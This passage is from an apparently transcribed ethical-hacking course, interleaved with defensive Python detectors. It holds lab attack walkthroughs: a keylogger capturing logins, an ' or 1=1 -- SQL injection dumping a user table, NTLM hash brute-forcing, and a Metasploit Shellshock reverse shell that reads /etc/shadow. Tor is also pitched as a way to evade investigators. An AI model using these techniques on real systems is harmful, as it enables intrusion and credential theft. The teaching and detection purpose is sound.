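                   "https://faceb00k.com/login",
                   "https://facebook.com.verify-account.example/"):
        print(sample, "->", phishing_indicators(sample) or "nothing flagged")
```

The checks are heuristics, so they belong in a mail gateway or browser extension as a warning rather than a hard block; a domain such as facetips.com from the passage above passes all three, which is the point: a lookalike that shares no characters with the brand has to be caught by other means, such as certificate transparency monitoring for the brand name.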

Just go online and we can try to spoof our identity, and I'm going to show you how. So I've got VMware Workstation right here, so we're just going to pull that up and we're going to power on a Windows 7 machine where we're going

To look at the onion routing. So the Windows machine has booted up, we're just going to log in, and this is my Windows 7 machine. Now I've got a Chrome browser right here and we're going to go to a website called cmyip.com, which is going to give the IP address that I'm

Currently using. So right now I'm not connected to any VPN or anything, and you can see that's my IP address that I'm utilizing. Now if I want to anonymize myself, what I'm going to do is I am going to use Tor, and that's the Tor Browser

That's set up right there. If I click on it, it's going to open up the software, it's going to create a new connection, connect to the Tor network and allow me to anonymize myself. Right, so that's the Tor Browser opening up and

Giving me a new browser over here. So I've got one, which is the old one, which shows my current IP address. If I just refresh that, you'll see that I'm still on the same IP address as far as this browser is concerned. There's a refresh,

And it's still showing me the same IP address, whereas if I go on to Tor right now and if I go to cmyip.com, you will see that it is going to give me... and you can see the amount of time it is taking to reach that site. That's because

I am using a VPN and there's a lot of encryption running, and you can see now I'm currently connected via Hong Kong. Even to reach this site, what Tor does is it gives me a proxy chain. A proxy chain is where it creates multiple

Hops to hide my identity, and before I reach cmyip.com I am using three different IP addresses over here: one in France, one in Germany and one in Hong Kong. So if I do something over here, to trace back my steps to my actual IP address, the law enforcement agencies or

Anyone who is going to search, like a forensic investigator, would have to go through these IP addresses before they come back to me. Now it's not impossible, but the effort and time that's going to be taken to go across three different countries is going to be phenomenal, so

It may just defeat the purpose of having so many resources spent to identify who did what. So that's what Tor does for us. All right, moving on from Tor, we are going to look at keyloggers. Keyloggers are basically software that runs in the background and records all the keystrokes

Of the user. So if I've got a keylogger installed right now, whatever I type will be stored in a text file for the hacker so that they can look at it later on. And just to give you an example of that, we go back to my VMware Workstation and we

Open up another Windows 7 machine. I'm going to power this on and I'm going to close this one. So this virtual machine has booted up, we are going to log in as user1, just close all this software which is not required, and once this machine is booted

Up, what we're going to do is I'm just going to open up some random websites and see what we're doing. Basically there's a keylogger that's there in the startup that's going to record our keystrokes, and we just want to see what it actually does. Now Firefox is getting updated, so let's

Hold on. Now this is the latest version of Firefox, right, and we're just going to go to, let's say, facebook.com, wait for the website to open up. All right, let's try opening it up again, and that's facebook.com, and we're just going to type in some random username and password: someone at

somewhere.com, and the password being asd@1234567890. Log in. Obviously that login is not going to work, the user probably doesn't exist, or if it does the password is probably incorrect, and so we're going to close

This, we're going to, let's say, open up another browser window, go to another site, rediff.com, and then go to Rediffmail, try the same thing over here: someone@somewhere.com, password is 1234567, whatever it is. We can see the combination is incorrect. Now

There's a keylogger running in the background, and what we want is we now want to open up the keylogger. Now it is visible here because I've kept it visible; you can hide it from the Start menu and there's a shortcut key for you to pull it up later on, so this

Completely becomes invisible. And what it can do is it basically creates a record of whatever you have been doing so far, so you can see these things populating on the 25th of December. So if I look at the visited websites you can see I opened up Mozilla Firefox, the

First one where there was a problem loading the page, then we opened up Facebook, then we opened up rediffmail.com and so on and so forth. So this just gives me the list of visited websites, whereas if I look at keystrokes and clipboard you will see

Whatever we have typed in. So we first typed in facebook.com, then again the second time I tried to type in, then I hit backspace, then I typed in facebook.com, and then you can see I typed in someone@somewhere.com and then Tab, asd@12

34567890. We closed the browser, we opened up a new one and we went on to rediffmail.com, and then you can see me typing this one, then going back one space, then the rest of what I typed, and then the password coming in. So that's

What a keylogger does. If you look at the taskbar, it's not going to show you a keylogger running in the background; in Processes you're not going to see anything at all, but it's going to mask itself as a service. So if you look into the properties you can see that icon

Coming in over here which matches this one, and so you can see that this is masking itself as a service .exe. If this gets hidden as well, it would be very difficult for a user to even identify this. All right, so that's what a keylogger is. Moving on, let's see what
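The keylogger above hid under a system-service name. As an added example that is not part of the course, here is the check a defender would run over a process snapshot to catch that trick: a system binary name running from the wrong directory or under the wrong parent, or a near-miss spelling of one. The baseline table and the process snapshot are constructed for this illustration and should be rebuilt from a known-clean host in practice.

```python
from __future__ import annotations

import difflib
import ntpath

# Assumed baseline of Windows core processes: where the genuine binary lives and
# which process starts it. Build this from a clean machine of the same version.
SYSTEM_BINARIES = {
    "services.exe": {"dir": r"c:\windows\system32", "parent": "wininit.exe"},
    "lsass.exe":    {"dir": r"c:\windows\system32", "parent": "wininit.exe"},
    "svchost.exe":  {"dir": r"c:\windows\system32", "parent": "services.exe"},
    "csrss.exe":    {"dir": r"c:\windows\system32", "parent": "smss.exe"},
    "winlogon.exe": {"dir": r"c:\windows\system32", "parent": "smss.exe"},
}
LOOKALIKE_THRESHOLD = 0.85  # difflib ratio above which a name counts as a near miss


def check_process(name: str, exe_path: str, parent_name: str) -> list[str]:
    """Return the reasons this process looks like a masquerade (empty list = clean)."""
    reasons = []
    name_l = name.lower()
    parent_l = parent_name.lower()
    exe_dir = ntpath.dirname(exe_path).lower()

    expected = SYSTEM_BINARIES.get(name_l)
    if expected:
        # Exact system name: it must come from the system directory and the
        # parent that normally launches it.
        if exe_dir != expected["dir"]:
            reasons.append(f"{name} running from {ntpath.dirname(exe_path)} "
                           f"instead of {expected['dir']}")
        if parent_l != expected["parent"]:
            reasons.append(f"{name} spawned by {parent_name} "
                           f"instead of {expected['parent']}")
    else:
        # Not an exact system name: look for typo-squats such as svch0st.exe.
        for sysname in SYSTEM_BINARIES:
            ratio = difflib.SequenceMatcher(None, name_l, sysname).ratio()
            if ratio >= LOOKALIKE_THRESHOLD:
                reasons.append(f"{name} resembles system binary {sysname} "
                               f"(similarity {ratio:.2f})")
    return reasons


def scan(processes: list[dict]) -> dict[int, list[str]]:
    """Run check_process over a snapshot; keys are the PIDs that have findings."""
    findings = {}
    for p in processes:
        reasons = check_process(p["name"], p["exe"], p["parent"])
        if reasons:
            findings[p["pid"]] = reasons
    return findings


# Constructed snapshot standing in for tasklist / psutil output on the demo VM.
SAMPLE_PROCESSES = [
    {"pid": 624,  "name": "services.exe", "parent": "wininit.exe",
     "exe": r"C:\Windows\System32\services.exe"},
    {"pid": 900,  "name": "svchost.exe",  "parent": "services.exe",
     "exe": r"C:\Windows\System32\svchost.exe"},
    {"pid": 3000, "name": "firefox.exe",  "parent": "explorer.exe",
     "exe": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    # The keylogger: a system-sounding name, but started from the user's profile.
    {"pid": 4120, "name": "services.exe", "parent": "explorer.exe",
     "exe": r"C:\Users\user1\AppData\Roaming\klg\services.exe"},
    {"pid": 2200, "name": "svch0st.exe",  "parent": "explorer.exe",
     "exe": r"C:\Users\user1\Downloads\svch0st.exe"},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_PROCESSES).items():
        for r in reasons:
            print(f"PID {pid}: {r}")
```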

Else we want to talk about. So we've talked about Tor, we have talked about keyloggers, and now we want to talk about firewalls. Now for keyloggers to be prevented we need antivirus, right, so we need a good antivirus program that's going to be installed, updated and run on

A regular basis to protect ourselves from malware. But what about network connections? You need a firewall and a system to prevent or to detect what kind of connections are going on in the first place. Now we cannot rely on software 100 percent, so if a firewall is not configured properly

That's going to be a problem. So what we need to do is we have to have a firewall, configure it correctly, and then allow and disallow certain activity from happening. And what we're going to do is, I've got such a system on my machine here; I use a software called

GlassWire. What it does is it is a network analyzer, so it allows me to analyze whatever is going on. You can see all the apps that I'm utilizing and how much upload and download they have been doing, all the traffic, so you can see the protocols that I'm utilizing. So I come

To know what's going on in the background, and this gives me the entire graph of how much I have been doing for the past 24 hours, past three hours, past five minutes and so on and so forth. Right, so these are the activities and these are the alerts that it has been

Generating. I can click on those alerts and it will start telling me what it was all about. If the graph doesn't work for me, it gives me usage as well, so how much I have utilized since I've installed this software, right, and what applications have been utilized, which

Hosts I've been connected to and the traffic type that was utilized, and then the things on my network. So these are the devices that I currently have on my network that have been identified, and then comes the firewall. So on the firewall, when the firewall is

Clicked on, you see all those services that have been identified and you can just click on a particular service to block that service. So this becomes a discovery tool: it identifies whatever networking is going on, gives me all that information, and then I can look at it and I

Can just click on any of these services that I find malicious and block them. I can create different profiles for different applications as and when I want them, and these are the alerts. So you can see that this was the first time a network connection was

Looked at from VMware. And what this allows me to do is, whenever I execute a file, it can upload it to virustotal.com and scan it as a third-party antivirus to ensure that there is nothing malicious in it. So I already have an antivirus over here, but if this ever

Gets compromised, I can still rely on a third-party service where, in real time, as and when I execute my applications, they would be verified and I would be assured that nothing is wrong with my system. And this software that I'm utilizing, GlassWire Basic, is free, and

Then there are paid versions as well; glasswire.com is where you're going to find this. Moving on, rootkits. Rootkits are also malicious software that allows an unauthorized user to have access to a computer, to restricted areas of its software. Now a rootkit, in a sense, is a software, a malicious

Software that infects a machine and prevents some functionality on it, like hiding data or preventing users from running antivirus, and it's basically a malicious software that is used to hide information from the victim so that they would not realize that they have actually been compromised. It's

Going to be difficult to show a rootkit, so I cannot show that demo to you, so we're just going to move on and we're going to talk about ethical hacking techniques. Now when we say ethical hacking techniques, we want to look at what kind of audits are

Available when we want to do ethical hacking. So there's a black box audit, a white box audit and a gray box audit. So if I'm invited into an organization to conduct a test, to conduct an audit, to conduct a vulnerability assessment or a penetration test to identify vulnerabilities and then try to plug

Them, they are going to give me three different variations. In a black box audit they are not going to tell me about the infrastructure, they are not going to give me any information, and they want me to start from the basics of gathering information, identifying the systems, and based on the information

That I gather, whether I'm able to develop any hacks and compromise their infrastructure. So it will be a simulation of a hacker who's sitting outside the organization and trying to find a way in, whereas a white box audit is where full infrastructure knowledge is given: anything and everything that is

Required for an audit is given, and this is a simulation of an insider attack: a person sitting inside the organization misusing their permissions and then trying to compromise, trying to get access to data that they do not have access to. So the simulation is of a malicious insider. A gray box is where

Some partial knowledge is available, and from that partial knowledge you're going to try to build up more information and then you're going to try to get access to those resources. What are the tools that we utilize? So we've already had a couple of demos on keyloggers, SQL

Injection, sqlmap and so on and so forth. Metasploit is a very widely used tool for penetration testing, and having knowledge of Metasploit is very much necessary as far as ethical hacking is concerned. Nmap: this is a tool used for network discovery, essentially a scanner. Wireshark is a packet capturer

That allows you to capture packets and analyze whatever is going on. sqlmap is something that we have seen, a SQL injection attack tool which generates its own queries, and John the Ripper is a password cracking tool. BackTrack used to be an operating system that was utilized for penetration testing; however,

BackTrack has now been replaced by something called Kali Linux, and that's the operating system that we have utilized in all our demos where we tried to look at sqlmap and those injection attacks that we did. So what are the areas of ethical hacking? We have just

Talked about all these areas as well. Network services: we looked at the GlassWire application that showed us how my machine is consuming the network, which protocols are being consumed, how the connections are being created. If somebody's able to install a trojan on my machine, it is going to try

To create a new connection on the network with the hacker to allow that hacker backdoor access. Now if I have GlassWire or a similar firewall implemented, it is this firewall that is going to detect it and prevent that connection from happening. So if I

Install a software that is certainly suspicious, or that installs something else in the background that I may not be aware of, that tool is going to identify all the connections that are being made and it is going to highlight that connection. I need to go through all of those connections and identify whether

They are legit or not, and if I find something suspicious or doubtful I'm going to block that connection and then I'm going to investigate what's going on. And that's where ethical hacking comes into the picture: you want to find out if the firewall that you have implemented is

Going to work correctly or not, if the configuration of the firewall is done properly, or if the firewall is misconfigured, is it leaking out information. Right. At the same time you're looking at web applications: we looked at the OWASP Broken Web Applications where we did some SQL

Injection attacks, right. So that was a weakness or a vulnerability in that application which would allow us to bypass authentication and get access to resources that we were not authorized for. And then client-side attacks would be where you install a keylogger at the

Client system and then you try to capture whatever data the user is typing in, like usernames and passwords on the Facebook and the rediffmail.com websites that we saw, and then try to misuse that information to get access to those resources. Then Wi-Fi networks, right.

Wi-Fi is something that we use on a regular basis. We've got our smart devices nowadays, smartphones, tablets, phablets, that we can connect to Wi-Fi and start using all our services, our banking applications, on our smartphones, and thus we want to ensure that wireless connectivity is simple and is secured. So

You want to use encryption mechanisms, you want to use tools on your smartphones, antivirus, firewalls on your smartphones, to ensure that whatever you are utilizing is going to remain secure. And then social engineering: we've looked at the phishing website for facebook.com, we've seen how easy it is to clone websites and

Host them on an Apache server. So if you look at it from an ethical hacker's perspective, the job of an ethical hacker is to simulate these kinds of attacks that the hacker may conduct. First of all you're basically going to find out areas where these attacks can happen, think of it from a hacker's

Perspective, try to simulate those attacks and see if those attacks are going to be effective, can those attacks be prevented, and can the current security controls that you have put in place identify, detect and prevent these attacks from happening in the first place. And that is what ethical hacking

Is all about. Let's look at the Metasploit attack. Metasploit is a penetration testing framework that makes hacking very simple: you just need to know how to utilize the tool, you need to identify the vulnerability associated with a particular exploit, and then run the exploit on Metasploit. We'll be

Demoing this during the practical. So there are active exploits and passive exploits. An active exploit exploits a specific computer, runs until completion and then exits, uses brute force and exits when an error occurs. In a passive exploit, these exploits wait for incoming requests and exploit them as soon as

They connect. They can also be used in conjunction with emails and web browsers. So in passive exploits we create a payload, like a reverse connection payload, we send it to the victim, and once the victim installs that software the machine will then initiate a connection

To us. Our machine will be in listen mode, and once the software is executed over there we would then try to connect and exploit that particular vulnerability. This is the practical that we'll be doing on Metasploit, so let's move on with the

Demos and then we'll see what we can discuss amongst them. All right, let's have a look at some of the demos that we had talked about in the ethical hacking and penetration testing module. We are going to look at three different demos: the first one is going to be a SQL

Injection attack that we are going to perform on this tool that we have, the second one is a password cracking attack on Windows 7, and the third one is a Meterpreter-based or a Metasploit-based Shellshock attack on a Linux-based web server. So let's get cracking.

I've powered on this virtual machine, which is the OWASP Broken Web Applications VM. It is a tool that is provided for people who want to enhance their skills, and they can practice how to do these attacks in a legal manner. So we are going to go to this

Site. I'm just going to open up my browser, the IP address is 71.132, and that's the OWASP Broken Web Applications that we want to utilize. We are going to head off to Mutillidae II and we are going to look at a SQL injection attack where we want to bypass

Authentication. Now this takes us to the login screen, so we can just try a login here and see that the authentication mechanism works: the account does not exist, so the username and password that we have supplied are not the correct ones. So we want to ensure that there's a SQL

Database and we can try to attack it and see if we can bypass the authentication. Now what we want to do is we want to create a SQL-based malformed query that can give us a different output, so I'm just going to type in a single quote

Over here and hit Login, and you can see that this is now suddenly recognized as an operator and there's an error that is given out. Compared to the login that we tried earlier, when we used a proper text-based login it gave us "the account does not exist", but here the

Single quote gave us an error and it shows us how SQL works: this is the query that we had created. Now in the trainings that you have for ethical hacking there would be explanations of what these queries are all about, how the syntax works. Here

We're just going to see if we can create a malformed query to log in as a user in this case. So what I'm going to do is create the query over here. We're going to give it a comparison, so we're going to give it: or 1 equals 1, space,

Hyphen hyphen, space, and if you now click Login you should be able to bypass authentication, and you can see the user has been authenticated and we now have admin access to this application. Now here the SQL queries need to be crafted in such a way that they're going to work,

So there would be a lot of exercise in identifying what the database is: there's a Microsoft database, an Oracle database and so on and so forth, and then you have to choose the proper commands. But identifying that would come in the training; right now we're just looking at

A demo. This is how a SQL injection attack works. Now let me log out here. Similarly, now we were on a login page and the same query worked wonders where it allowed us to bypass authentication, so it also depends on what kind of a page I

Am on and what query would be accepted at this point in time. So here application understanding would also come into the picture: which function we are calling upon when we are connected to a particular page. Now this is a user lookup function, right, so again here we

Try the same method, test/test, that's not going to work: authentication error, bad user or password. And if we type in the same query over here, single quote, or, and give it a condition: single quote, or 1 equals 1, space, hyphen hyphen, space.

Now here it is not going to log us in because this is not a login page, this is a user lookup form, so here it will instead give us a dump of all the data that it has. So you can see all the usernames and passwords coming in

That are stored in the user table. So this is where the understanding comes in of which query to create at what page we are on, depending upon the function that is being called. Right, so that's the SQL injection attack that we wanted to look at. Let's move on to password
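The two Mutillidae forms above behave the way they do because user input is spliced into the SQL text. This added example (not code from the course or from Mutillidae) rebuilds both forms against an in-memory SQLite table, runs the same payload against the vulnerable version and against one that uses bound parameters, and shows the authentication bypass and the full-table dump disappearing in the parameterized version; the accounts table is constructed.

```python
import sqlite3

# Constructed accounts table; passwords are kept in the clear only to mirror the
# dump the demo app produced. A real application stores salted password hashes.
ACCOUNTS = [("admin", "adminpass"), ("hacker", "h4ck3r"), ("test", "test")]

# The exact payload typed into the demo: single quote, "or 1=1", space, two hyphens, space.
PAYLOAD = "' or 1=1 -- "


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", ACCOUNTS)
    return conn


def login_vulnerable(conn, username, password):
    # The quote in the username closes the string literal, "or 1=1" makes the
    # WHERE clause always true, and "-- " comments out the password check.
    sql = ("SELECT username FROM accounts WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Bound parameters: the driver passes the values separately from the SQL
    # text, so a quote or comment marker is plain data and cannot alter the query.
    row = conn.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def lookup_vulnerable(conn, username):
    # Same flaw on the user-lookup form: the always-true condition does not log
    # anyone in here, it returns every row, which is the dump seen in the demo.
    sql = "SELECT username, password FROM accounts WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    return conn.execute(
        "SELECT username, password FROM accounts WHERE username = ?", (username,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, PAYLOAD, "anything"))  # admin
    print("safe login:     ", login_safe(db, PAYLOAD, "anything"))        # None
    print("vulnerable lookup returns", len(lookup_vulnerable(db, PAYLOAD)), "rows")  # 3
    print("safe lookup returns     ", len(lookup_safe(db, PAYLOAD)), "rows")        # 0
```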

Cracking. Now this is a Windows 7 machine that we have. I'm just going to do a very basic password cracking example, we're just going to log in. Now here the assumption is that we are able to log in, we have access to a computer, and we want

To check out other users who are using this computer and see if we can find out their passwords, so that we can log in as a different user, steal data if required, and we wouldn't be to blame if there are any logs that are created. So

Here we've got a tool called Cain & Abel that is installed right here. Now I'm already an administrator on this machine and I'm checking out other administrators who share the same privileges, or any other user who may be on this system, whose password I can crack and thus I

Would be able to get access through their account and then do any malicious activity. Right, so this allows me to go into a cracker tool and it allows me to enumerate this machine and identify all the users and passwords that are there on this particular machine. Right, so I'm

Just going to click on the plus sign and I'm going to import hashes from the local system. So where are these files stored, where does Windows store its passwords, in what format are they stored, and what this tool does to retrieve those, that's something that we all need to know as

Ethical hackers, right. So import the hashes from the local system, click on Next, it's going to enumerate that file and it is going to give you a list of all the users that are there. So you can see the users are hacker, admin, test, the one that

We are logged in as, and then the user called virus as well, and you can see that this is the hash value of the password that is being utilized. Now there's a particular format for the hash value for Windows and how it stores it, but once we have these hash values, let's say

If I want to crack this password, there are various attacks that we can do, for example a dictionary-based attack or a brute force attack. Let's try a brute force attack. Right, NTLM is the hashing mechanism that is used by Windows, so we're going to try to create an NTLM

Hash attack, and here we are going to use a predetermined rule set. For example, we are not sure what characters are being utilized over here, so we just create an attack like this using all characters: lowercase a through z, uppercase A through Z, numeric 0 through 9 and

All the special characters. Let's say that the password is between 7 and 16 characters and this is the character set that we want to try the brute force attack on. What is a brute force attack? It is an attack where the computer is going to try each and every permutation

And combination out of this character set and try to figure out if the password is going to be correct. So if we click Start it's going to start with particular characters and then it is going to identify if that NTLM hash is going to match this candidate, and

You can see the time is going to be phenomenal over here. So it's not necessary that this attack would be viable: it will be 100 percent successful given the time frame; however, the time frame is huge enough for this attack to become a little bit redundant. There are other

Attacks that we can do which can easily identify this data for us as well, but that is something that we will look at in future videos. So that's how you can get access to users and passwords. There are different mechanisms where, let's say, we don't have login access.
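To put a number on "the time is going to be phenomenal", this added example (not from the course) computes the size of the search the demo started, 7 to 16 characters over the full 94-symbol set, and the worst-case time at an assumed guess rate, next to some weaker policies for contrast. The rate of 1e10 guesses per second is an assumption for illustration, not a measured figure; real throughput depends on hardware, hash type and salting.

```python
import string

# Assumed guess rate for an unsalted NTLM brute force on a GPU rig; illustrative only.
ASSUMED_GUESSES_PER_SECOND = 10_000_000_000
SECONDS_PER_YEAR = 365.25 * 24 * 3600

# Character-set size from the demo's rule set: a-z, A-Z, 0-9 and the special characters.
FULL_SET = len(string.ascii_lowercase + string.ascii_uppercase
               + string.digits + string.punctuation)  # 94


def keyspace(charset_size: int, min_len: int, max_len: int) -> int:
    """Number of candidate strings over `charset_size` symbols with lengths min..max."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def worst_case_seconds(space: int, rate: float = ASSUMED_GUESSES_PER_SECOND) -> float:
    """Time to try every candidate once; on average the match is found at about half."""
    return space / rate


def worst_case_years(charset_size, min_len, max_len, rate=ASSUMED_GUESSES_PER_SECOND):
    secs = worst_case_seconds(keyspace(charset_size, min_len, max_len), rate)
    return secs / SECONDS_PER_YEAR


def compare_policies(rate=ASSUMED_GUESSES_PER_SECOND):
    """Contrast the demo's 7-16 char full-charset search with weaker password policies."""
    policies = {
        "digits only, 4-6 chars (PIN)":        (len(string.digits), 4, 6),
        "lowercase only, exactly 8":           (len(string.ascii_lowercase), 8, 8),
        "letters+digits, exactly 8":           (len(string.ascii_letters + string.digits), 8, 8),
        "demo rule set: 94 symbols, 7-16":     (FULL_SET, 7, 16),
    }
    return {name: worst_case_seconds(keyspace(*p), rate) for name, p in policies.items()}


if __name__ == "__main__":
    for name, secs in compare_policies().items():
        if secs < 3600:
            print(f"{name:36s} {secs:14.1f} seconds")
        else:
            print(f"{name:36s} {secs / SECONDS_PER_YEAR:14.3g} years")
```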

Then what are we going to do? How can we create a fake user login, or how can we remotely access a machine and then try to get the same access? And that is what we are going to try to do in the next demo on a Linux machine. So what we are

Doing on a Linux machine could also be doable on the Windows machine with a different exploit. So what I'm going to do is, this is the Linux web server that I have, that I'm going to power on. I'm going to use a Kali Linux machine to

Hack that device, and I'm going to just power off my Windows 7 machine. Give it a minute till it boots up. Now this is also a demo machine that we have which has its own pre-configured vulnerabilities, so here we've got something from PentesterLab which has a Shellshock vulnerability

Implemented inside. The Shellshock vulnerability affects Linux, Mac and Unix-based operating systems for particular versions of the Bash shell. Bash is the Bourne Again Shell, which is the command line interface in these operating systems. So what we are trying to do here is we are going to use the Kali Linux

Machine, try to find out the vulnerability over here, and if it exists we are going to use Metasploit to attack this machine. Now the first and foremost thing is we want to identify the IP address. We have no idea what the IP address is; we are in the same subnet, so

We are assuming that we are able to connect to this machine. So what I am going to do is I'm going to open up a tool called Zenmap. I'm going to open up a command line interface, find out what my IP address is, and my IP address is

This, with a subnet mask of 255.255.255.0. So I want to see if there are any other machines that are live in the same subnet, and we are doing a ping sweep over here to identify which machines are live. In a minute we'll get all the IP

Addresses: 71.1, .133, .254 and .120. We know that we are .128 at this point in time, .254 is the DHCP server, so we are assuming that .133 is the machine that we want to look at, and let's then try to see if we can scan that machine, .133, and

We're going to do an intense scan to find out which ports are open, what services are running over there, and whether it is the pentest machine that we were looking for. You can see at the start port 22 and port 80, and somewhere here it's going to give us the

Ports that are open and the details about those ports, and somewhere here it will tell us that this is the PentesterLab machine that we wanted, which is correct. So now we want to do a vulnerability analysis on this. What we are going to do is I'm going to use

Another GUI-based tool called Sparta, which I can just find from here. Sparta uses two tools in the background, the Nmap tool and a tool called Nikto. So we're just going to start scanning: 192.168.71.133 was the IP address, add to scope, and over a period of time you can see

All of these will start populating with information. There we are, that's the Nikto tool coming in, scanning on port 80, which means that it's a web server using HTTP. It tells us it's Apache httpd 2.2.21, and that gives us the port number 22 as

Well. If we head over to the Nikto tab, or let's look at the screenshot first, this is what the website would be looking like, and Nikto gives us the output over here: it tells us that there is a vulnerability over here for Shellshock, and this is the path where the

Vulnerability is going to exist. So what we are going to do is we go back to the command line, sorry, we open up a new one, minimize all these other windows, and we are going to open up Metasploit. Metasploit is a penetration testing tool that is used by most hackers and ethical

Hackers to test applications and test existing exploits and vulnerabilities. So just give it a minute till it starts. You can see there are already around 1700 exploits right here. We're going to see all those exploits with these commands. There we are, sorry for the typo,

And it will just give us a list of all the exploits that are stored in Metasploit in this version. So all of these are Windows-based; if we scroll up we will be looking at other vulnerabilities as well, or exploits: the Unix-based exploits, Linux, OS X, multi exploits, and we're looking for an

Exploit for multi-based Apache or HTTP. Let's go up, let's look at... so this is the one that we're looking for: Apache mod_cgi Bash environment exec. So what we're going to do is we're just going to copy it, go back to the bottom, say use exploit and paste the one that

We wanted, press Enter, say show options. So it will ask us to configure this. I'm just going to configure it based on the knowledge that we have: set RHOST, which is the remote host, the victim's machine, so we put in the IP address. It asks us for the target

URI, so that's the path that we saw: set TARGETURI to /cgi-bin/status, Enter. Now with the exploit we need to find a payload that is going to give us the output that we want, so we say show payloads and it will give us a list of all the

Compatible payloads with this exploit, and we want to create a reverse TCP connection, which is this. So we know it's a Linux operating system, we want this payload to be set, so set payload, press Enter, that's the payload coming in. show options now that we have set the payload:

These are the options for the exploit, and now we want to set our options for the payload as well. So we are creating a reverse TCP connection, which means we are remotely executing code at the victim side and making the victim connect back to our machine, which means

We need to set up a listener. So I need to put my IP address over here: set local host, or LHOST, 192.168.71.128, which was our IP address. show options again just to ensure everything is fine, which it looks like it is, and we then type in the word exploit

So that it will start this attack. I can see that it has created a Meterpreter session at the victim site and it has opened up a session. So if I do a pwd now, pwd is a Linux command for present working directory, and it will show us

That we're connected to /var/www/cgi-bin. Do an ls, it will list all the files: that's the status file over there. Do a cd /, it will take us to the root of this machine. Now remember we saw the passwords on a Windows machine.

Similarly we can cd over to the /etc folder, ls, and you can see these files, passwd and shadow. Now passwd is the file where Linux stores its usernames and shadow is the file where passwords are stored. So do a cat command on passwd and you

Can see these users coming up. So you can see the last user, pentesterlab, and you can see there are no passwords. So let's do a cat shadow, and that's your hash value for the password that we have for the user pentesterlab. So these are the
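From the defender's side of the Shellshock demo above: an added example (not from the course or from PentesterLab) that scans Apache combined-format access logs for the Bash function prefix that mod_cgi would pass into a CGI script's environment through a header such as User-Agent or Referer. The log lines are constructed, with a placeholder standing in for any command.

```python
import re

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Bash exported-function prefix: "()" then optional whitespace then "{".
# A normal User-Agent has parentheses too, e.g. "(X11; Linux x86_64)", but never "() {".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed sample log: two ordinary requests, two probes against the demo's
# /cgi-bin/status path (one via User-Agent, one via Referer), one garbage line.
SAMPLE_LOG = """\
192.168.71.50 - - [25/Dec/2020:10:14:55 +0000] "GET / HTTP/1.1" 200 1041 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/84.0"
192.168.71.50 - - [25/Dec/2020:10:15:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1) Chrome/87.0"
192.168.71.128 - - [25/Dec/2020:10:15:30 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; [command placeholder]"
192.168.71.128 - - [25/Dec/2020:10:15:31 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :;}; [command placeholder]" "curl/7.72.0"
this line is not in combined log format
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_probes(log_text):
    """Return (findings, unparsed_count); each finding names the IP, path and offending field."""
    findings, unparsed = [], 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            unparsed += 1  # keep count: a log you cannot parse is a blind spot
            continue
        parts = rec["request"].split()
        path = parts[1] if len(parts) >= 2 else rec["request"]
        for field in ("agent", "referer", "request"):
            if SHELLSHOCK_RE.search(rec[field]):
                findings.append({
                    "ip": rec["ip"], "time": rec["time"], "path": path,
                    "field": field,
                    # Probes at CGI paths are the ones mod_cgi would actually hand to bash.
                    "cgi": path.startswith("/cgi-bin/"),
                })
    return findings, unparsed


if __name__ == "__main__":
    hits, skipped = find_shellshock_probes(SAMPLE_LOG)
    for h in hits:
        print(f"{h['time']} {h['ip']} -> {h['path']} via {h['field']} (cgi={h['cgi']})")
    print(f"{skipped} line(s) could not be parsed")
```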

Different attacks that we need to understand, and we need to create them based on the vulnerabilities that exist on different machines. So we just looked at Windows and Linux and how we can exploit them depending on existing vulnerabilities. As an ethical hacker, this is what we need to learn in our

Trainings, and then we need to clear our exams based on this knowledge of how these things work, so that we get certified and then we can position ourselves for penetration testing jobs. With the rise in censorship and general fear over privacy loss, consumer security is at an all-time high risk.

Technology has made our life so much easier while putting up a decent target on our personal information. It is necessary to understand how to simultaneously safeguard our data and be up to date with the latest technological developments. Maintaining this balance has become easier with cryptography taking its place in today's

Digital world. So here's a story to help you understand cryptography. Meet Anne. Anne wanted to look for a decent discount on the latest iPhone. She started searching on the internet and found a rather shady website that offered a 50 percent discount on the first purchase. Once Anne submitted her payment details, a

Huge chunk of money was withdrawn from her bank account just moments after. Devastated, Anne quickly realized she had failed to notice that the website was an HTTP web page instead of an HTTPS one. The payment information submitted was not encrypted and it was visible to anyone keeping an eye, including the

Website owner and hackers. Had she used a reputed website which has encrypted transactions and employs cryptography, our iPhone enthusiast could have avoided this particular incident. This is why it's never recommended to visit unknown websites or share any personal information on them. Let's now understand what cryptography is. Cryptography is the science of

Encrypting or decrypting information to prevent unauthorized access. We transform our data and personal information so that only the correct recipient can understand the message. As an essential aspect of modern data security, using cryptography allows the secure storage and transmission of data between willing parties. Encryption is a primary route for

Employing cryptography by adding certain algorithms to jumble up the data decryption is the process of reversing the work done by encrypting information so that the data becomes readable again both of these methods form the basis of cryptography for example when Simplilearn is jumbled up or changed in any format not many

